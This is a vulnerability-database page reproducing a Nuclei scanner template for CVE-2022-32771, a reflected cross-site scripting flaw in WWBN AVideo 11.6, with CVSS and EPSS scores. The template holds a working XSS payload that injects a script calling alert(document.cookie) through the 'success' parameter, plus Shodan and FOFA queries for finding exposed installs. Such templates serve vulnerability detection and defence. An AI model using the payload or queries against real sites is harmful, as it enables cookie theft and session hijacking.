Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-32771
HistoryAug 28, 2022 - 7:50 a.m.

WWBN AVideo 11.6 - Cross-Site Scripting

2022-08-2807:50:20
ProjectDiscovery
github.com
1

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.2 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

32.2%

WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.
id: CVE-2022-32771

info:
  name: WWBN AVideo 11.6 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
    - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32771
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-32771
    cwe-id: CWE-79
    epss-score: 0.00074
    epss-percentile: 0.31793
    cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wwbn
    product: avideo
    shodan-query:
      - http.html:"AVideo"
      - http.html:"avideo"
    fofa-query: body="avideo"
  tags: cve,cve2022,avideo,xss,wwbn

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'avideoAlertSuccess("</script><script>alert(document.cookie);</script>'
          - 'text: "</script><script>alert(document.cookie);</script>'
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402202f06075a7647292d0ea0168dccf1b9f2959c21be2beafa0d57ccda4b88be023f02201376c66c5a46d015d63ed5c2994c46cc0f8c57a562f9832c1c3386710c5d8ba9:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.2 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

32.2%

Related for NUCLEI:CVE-2022-32771